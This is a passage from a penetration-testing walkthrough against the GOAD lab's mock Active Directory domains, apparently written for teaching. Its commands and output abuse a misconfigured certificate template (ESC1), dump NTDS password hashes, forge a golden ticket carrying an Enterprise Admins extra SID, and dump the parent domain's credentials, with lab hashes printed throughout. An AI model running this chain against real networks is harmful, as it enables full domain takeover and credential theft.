    Certificate Validity End: 2029-08-11 03:47:49+00:00 
    Web Enrollment : Enabled 
    User Specified SAN : Enabled 
    Request Disposition : Issue 
    Enforce Encryption for Requests : Enabled 
    Permissions 
      Owner : ESSOS.LOCAL\Administrators 
      Access Rights 
        ManageCertificates : ESSOS.LOCAL\Administrators 
                                          ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Enterprise Admins 
        ManageCa : ESSOS.LOCAL\Administrators 
                                          ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Enterprise Admins 
        Enroll : ESSOS.LOCAL\Authenticated Users 
    [!] Vulnerabilities 
      ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022 
      ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue 
Certificate Templates 
  0 
    Template Name : ESC4 
    Display Name : ESC4
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : False 
    Enrollment Agent : False 
    Any Purpose : False 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectRequireDirectoryPath 
                                          SubjectRequireEmail 
                                          SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
                                          PublishToDs 
                                          PendAllRequests 
                                          IncludeSymmetricAlgorithms 
    Private Key Flag : ExportableKey 
    Extended Key Usage : Code Signing 
    Requires Manager Approval : True 
    Requires Key Archival : False 
    Authorized Signatures Required : 1 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities 
      ESC4 : 'ESSOS.LOCAL\\khal.drogo' has dangerous permissions 
  1 
    Template Name : ESC3-CRA 
    Display Name : ESC3-CRA 
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : False 
    Enrollment Agent : True 
    Any Purpose : False 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
    Private Key Flag : 16842752 
    Extended Key Usage : Certificate Request Agent 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 
  2 
    Template Name : ESC2 
    Display Name : ESC2 
    Certificate Authorities : ESSOS-CA
    Enabled : True 
    Client Authentication : True 
    Enrollment Agent : True 
    Any Purpose : True 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
    Private Key Flag : 16842752 
    Extended Key Usage : Any Purpose 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC2 : 'ESSOS.LOCAL\\Domain Users' can enroll and template can be used for any purpose 
      ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 
  3 
    Template Name : ESC1 
    Display Name : ESC1 
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : True 
    Enrollment Agent : False 
    Any Purpose : False
    Enrollee Supplies Subject : True 
    Certificate Name Flag : EnrolleeSuppliesSubject 
    Enrollment Flag : None 
    Private Key Flag : 16842752 
    Extended Key Usage : Client Authentication 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals: ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC1 : 'ESSOS.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

A variety of vulnerable content was displayed.

This time I’ll try attacking with ESC1.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad req -u 'khal.drogo@essos.local' -p 'horse' -dc-ip 192.168.56.12 -target 192.168.56.23 -ca 'ESSOS-CA' -template ESC1 -upn 'administrator@essos.local' 
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Requesting certificate via RPC 
[*] Successfully requested certificate 
[*] Request ID is 9 
[*] Got certificate with UPN 'administrator@essos.local' 
[*] Certificate has no object SID 
[*] Saved certificate and private key to 'administrator.pfx' 
                                                                                                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12 
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Using principal: administrator@essos.local 
[*] Trying to get TGT... 
[*] Got TGT 
[*] Saved credential cache to 'administrator.ccache' 
[*] Trying to retrieve NT hash for 'administrator' 
[*] Got hash for 'administrator@essos.local': aad3b435b51404eeaad3b435b51404ee:217e50203a5aba59cefa863c724bf61b 
                                                                                                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/braavos] 
└─$ ls 
20241023161533_Certipy.json 20241023161533_Certipy.txt 20241023161533_Certipy.zip administrator.ccache administrator.pfx asreproast.hash braavos.nmap missandei.ccache

I was able to get a TGT for Administrator.

Can do anything an Administrator TGT can do.

Sevenkingdoms walkthrough

Exploit the top-level parent domain SEVENKINGDOMS.

I’ll try making a golden key myself.

First, get the NTLM hash of krbtgt for north.sevenkingdoms.local:

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ nxc smb north.sevenkingdoms.local -u Administrator -H aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 --ntds 
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y 
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                                                                                                                                       
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) 
SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... 
SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: 
SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9cd8721de5b33c59702a9f64787f1ea3::: 
SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: 
SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: 
SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: 
SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: 
SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d::: 
SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: 
SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: 
SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: 
SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: 
SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: 
SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: 
SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:77681f192335d80e476b29aabe77c9bf::: 
SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67::: 
SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:f85ab966533246d54fc98f68f6741dd8::: 
SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds of which 16 were added to the database 
SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command: 
SMB grep -iv disabled | cut -d ':' -f1 
SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds | cut -d ':' -f1

Got the hash for krbtgt.

Next, let’s get the Domain SID.

First192.168.56.11

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.11 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.56.11 
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2343606889-1312097775-3500245986 
500: NORTH\Administrator (SidTypeUser) 
501: NORTH\Guest (SidTypeUser) 
502: NORTH\krbtgt (SidTypeUser) 
512: NORTH\Domain Admins (SidTypeGroup) 
513: NORTH\Domain Users (SidTypeGroup) 
514: NORTH\Domain Guests (SidTypeGroup) 
515: NORTH\Domain Computers (SidTypeGroup) 
516: NORTH\Domain Controllers (SidTypeGroup) 
517: NORTH\Cert Publishers (SidTypeAlias) 
520: NORTH\Group Policy Creator Owners (SidTypeGroup) 
521: NORTH\Read-only Domain Controllers (SidTypeGroup) 
522: NORTH\Cloneable Domain Controllers (SidTypeGroup) 
525: NORTH\Protected Users (SidTypeGroup) 
526: NORTH\Key Admins (SidTypeGroup) 
553: NORTH\RAS and IAS Servers (SidTypeAlias) 
571: NORTH\Allowed RODC Password Replication Group (SidTypeAlias) 
572: NORTH\Denied RODC Password Replication Group (SidTypeAlias) 
1000: NORTH\vagrant (SidTypeUser) 
1001: NORTH\WINTERFELL$ (SidTypeUser) 
1102: NORTH\DnsAdmins (SidTypeAlias) 
1103: NORTH\DnsUpdateProxy (SidTypeGroup) 
1104: NORTH\SEVENKINGDOMS$ (SidTypeUser) 
1105: NORTH\CASTELBLACK$ (SidTypeUser) 
1106: NORTH\Stark (SidTypeGroup) 
1107: NORTH\Night Watch (SidTypeGroup) 
1108: NORTH\Mormont (SidTypeGroup) 
1109: NORTH\AcrossTheSea (SidTypeAlias) 
1110: NORTH\arya.stark (SidTypeUser) 
1111: NORTH\eddard.stark (SidTypeUser) 
1112: NORTH\catelyn.stark (SidTypeUser) 
1113: NORTH\robb.stark (SidTypeUser) 
1114: NORTH\sansa.stark (SidTypeUser) 
1115: NORTH\brandon.stark (SidTypeUser) 
1116: NORTH\rickon.stark (SidTypeUser) 
1117: NORTH\hodor (SidTypeUser) 
1118: NORTH\jon.snow (SidTypeUser) 
1119: NORTH\samwell.tarly (SidTypeUser) 
1120: NORTH\jeor.mormont (SidTypeUser) 
1121: NORTH\sql_svc (SidTypeUser)

Next, 192.168.56.10

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.10 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.56.10 
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2095540843-66383145-2975355457 
498: SEVENKINGDOMS\Enterprise Read-only Domain Controllers (SidTypeGroup) 
500: SEVENKINGDOMS\Administrator (SidTypeUser) 
501: SEVENKINGDOMS\Guest (SidTypeUser) 
502: SEVENKINGDOMS\krbtgt (SidTypeUser) 
512: SEVENKINGDOMS\Domain Admins (SidTypeGroup) 
513: SEVENKINGDOMS\Domain Users (SidTypeGroup) 
514: SEVENKINGDOMS\Domain Guests (SidTypeGroup) 
515: SEVENKINGDOMS\Domain Computers (SidTypeGroup) 
516: SEVENKINGDOMS\Domain Controllers (SidTypeGroup) 
517: SEVENKINGDOMS\Cert Publishers (SidTypeAlias) 
518: SEVENKINGDOMS\Schema Admins (SidTypeGroup) 
519: SEVENKINGDOMS\Enterprise Admins (SidTypeGroup) 
520: SEVENKINGDOMS\Group Policy Creator Owners (SidTypeGroup) 
521: SEVENKINGDOMS\Read-only Domain Controllers (SidTypeGroup) 
522: SEVENKINGDOMS\Cloneable Domain Controllers (SidTypeGroup) 
525: SEVENKINGDOMS\Protected Users (SidTypeGroup) 
526: SEVENKINGDOMS\Key Admins (SidTypeGroup) 
527: SEVENKINGDOMS\Enterprise Key Admins (SidTypeGroup) 
553: SEVENKINGDOMS\RAS and IAS Servers (SidTypeAlias) 
571: SEVENKINGDOMS\Allowed RODC Password Replication Group (SidTypeAlias) 
572: SEVENKINGDOMS\Denied RODC Password Replication Group (SidTypeAlias) 
1000: SEVENKINGDOMS\vagrant (SidTypeUser) 
1001: SEVENKINGDOMS\KINGSLANDING$ (SidTypeUser) 
1102: SEVENKINGDOMS\DnsAdmins (SidTypeAlias) 
1103: SEVENKINGDOMS\DnsUpdateProxy (SidTypeGroup) 
1104: SEVENKINGDOMS\NORTH$ (SidTypeUser) 
1105: SEVENKINGDOMS\ESSOS$ (SidTypeUser) 
1106: SEVENKINGDOMS\Lannister (SidTypeGroup) 
1107: SEVENKINGDOMS\Baratheon (SidTypeGroup) 
1108: SEVENKINGDOMS\Small Council (SidTypeGroup) 
1109: SEVENKINGDOMS\DragonStone (SidTypeGroup) 
1110: SEVENKINGDOMS\KingsGuard (SidTypeGroup) 
1111: SEVENKINGDOMS\DragonRider (SidTypeGroup) 
1112: SEVENKINGDOMS\AcrossTheNarrowSea (SidTypeAlias) 
1113: SEVENKINGDOMS\tywin.lannister (SidTypeUser) 
1114: SEVENKINGDOMS\jaime.lannister (SidTypeUser) 
1115: SEVENKINGDOMS\cersei.lannister (SidTypeUser) 
1116: SEVENKINGDOMS\tyron.lannister (SidTypeUser) 
1117: SEVENKINGDOMS\robert.baratheon (SidTypeUser)
1118: SEVENKINGDOMS\joffrey.baratheon (SidTypeUser) 
1119: SEVENKINGDOMS\renly.baratheon (SidTypeUser) 
1120: SEVENKINGDOMS\stannis.baratheon (SidTypeUser) 
1121: SEVENKINGDOMS\petyer.baelish (SidTypeUser) 
1122: SEVENKINGDOMS\lord.varys (SidTypeUser) 
1123: SEVENKINGDOMS\maester.pycelle (SidTypeUser)

192.168.56.11:S-1-5-21-2343606889-1312097775-3500245986

192.168.56.10:S-1-5-21-2095540843-66383145-2975355457

Now that you have the krbtgt hash and the SID of the domain you want to promote, you can create a Golden Ticket.

The important thing to note here is to add 519 to the end of extra-sid. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection#sid-history-injection-attack

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-ticketer -nthash 9cd8721de5b33c59702a9f64787f1ea3 -domain-sid S-1-5-21-2343606889-1312097775-3500245986 -domain north.sevenkingdoms.local -extra-sid S-1-5-21-2095540843-66383145-2975355457-519 goldenuser 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos 
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). 
  aTime = timegm(datetime.datetime.utcnow().timetuple()) 
[*] Customizing ticket for north.sevenkingdoms.local/goldenuser 
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). 
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration)) 
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). 
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) 
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). 
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) 
[*] PAC_LOGON_INFO 
[*] PAC_CLIENT_INFO_TYPE 
[*] EncTicketPart 
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). 
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) 
[*] EncAsRepPart 
[*] Signing/Encrypting final ticket 
[*] PAC_SERVER_CHECKSUM 
[*] PAC_PRIVSVR_CHECKSUM 
[*] EncTicketPart 
[*] EncASRepPart 
[*] Saving ticket in goldenuser.ccache

Secretsdump the top-level domain.

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ export KRB5CCNAME=goldenuser.ccache 
                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-secretsdump -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) 
[*] Using the DRSUAPI method to get NTDS.DIT ​​secrets 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:20c52248354cb5f4cce513c736ce99a5::: 
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
tywin.lannister:1113:aad3b435b51404eeaad3b435b51404ee:af52e9ec3471788111a6308abff2e9b7::: 
jaime.lannister:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080::: 
cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b::: 
tyron.lannister:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998::: 
robert.baratheon:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe::: 
joffrey.baratheon:1118:aad3b435b51404eeaad3b435b51404ee:3b60abbc25770511334b3829866b08f1::: 
renly.baratheon:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce::: 
stannis.baratheon:1120:aad3b435b51404eeaad3b435b51404ee:d75b9fdf23c0d9a6549cff9ed6e489cd::: 
petyer.baelish:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210::: 
lord.varys:1122:aad3b435b51404eeaad3b435b51404ee:52ff2a79823d81d6a3f4f8261d7acc59::: 
maester.pycelle:1123:aad3b435b51404eeaad3b435b51404ee:9a2a96fa3ba6564e755e8d455c007952::: 
KINGSLANDING$:1001:aad3b435b51404eeaad3b435b51404ee:f661727e5c8df73a4d6bc2892ff5bda6::: 
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:35296a99e4d4c1f512b05b4486ff56aa::: 
ESSOS$:1105:aad3b435b51404eeaad3b435b51404ee:86ac8394a5c6af4329886bf9e4d58407::: 
[*] Cleaning up...

Administrator credentials have been obtained.

Conclusion

This completes the process. You have now obtained administrator privileges and authentication information for each machine.

I hope this article has helped you understand pentesting better.

We are currently looking for people who would like to work with us at NFLabs. to conduct research and give back to the field, so we look forward to your application.

https://nflabs.jp/recruit/

Well, I hope to have another opportunity to write something for you.

Reference materials

mayfly277.github.io